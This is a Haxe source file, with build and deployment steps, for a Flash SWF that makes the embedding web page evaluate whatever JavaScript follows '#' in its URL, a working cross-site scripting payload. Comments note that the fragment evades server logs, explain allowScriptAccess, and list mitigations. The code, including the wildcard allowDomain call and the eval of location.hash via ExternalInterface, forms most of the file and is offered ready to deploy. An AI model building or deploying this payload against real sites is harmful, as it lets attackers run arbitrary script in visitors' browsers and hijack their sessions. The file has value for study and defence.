// xss.hx
//
// Purpose:
//   This haxe source file builds a SWF which injects JavaScript into the
//   including page.
//
// To build:
//   1. Acquire the latest stable version of haxe from http://haxe.org/download
//      Note: To run haxe, you may also need Neko (http://nekovm.org/download)
//   2. Create a file called xss.hx with these contents.
//   3. Create a file called compile.hxml with the following content:
//        -swf-version 9
//        -swf xss.swf
//        -main xss
//   4. From the command line, execute:
//        haxe compile.hxml
//
// To activate:
//   1. Take xss.swf generated by haxe and deploy it to your webserver.
//   2. Embed it into your HTML file with code like the following:
//      (the embed markup is not present in this copy of the file)
//
// Security notes for reviewers and defenders:
//   - The script that runs in the page is whatever follows '#' in the
//     embedding page's URL. The fragment is not sent in HTTP requests, so
//     server-side request logs and filters will not contain it.
//   - Whether the SWF may call into the page at all is governed by the
//     embed's allowScriptAccess parameter ("always", "sameDomain", "never").
//     "never" blocks the call; "sameDomain" blocks it when the SWF is served
//     from a different domain than the page.
//   - The exposure is therefore with sites that host user-supplied SWFs on
//     the application's own origin, or that embed third-party SWFs with
//     allowScriptAccess="always".
//   - Mitigations: serve uploaded files from a separate domain, set
//     allowScriptAccess="never" on any SWF that is not fully trusted, and
//     send a Content-Security-Policy with object-src 'none' where plugins
//     are not needed.
import flash.external.ExternalInterface;

class Xss {
    /**
     * SWF entry point: opens the SWF to every domain, then asks the
     * embedding page to evaluate its own URL fragment as JavaScript.
     */
    public static function main() {
        // Wildcard trust: content from any domain is allowed to script
        // into this SWF.
        flash.system.Security.allowDomain("*");

        // The three pieces concatenate to a JavaScript function expression
        // whose body schedules, via a string-argument setTimeout, an eval of
        // location.hash with the leading '#' sliced off.
        var opener = "(function(){setTimeout(\"";
        var hashEval = "eval(document.location.hash.slice(1))";
        var closer = "\",0);})";

        // ExternalInterface.call hands the expression to the container
        // (the browser page) to be invoked; this is the point that
        // allowScriptAccess permits or blocks.
        ExternalInterface.call(opener + hashEval + closer);
    }
}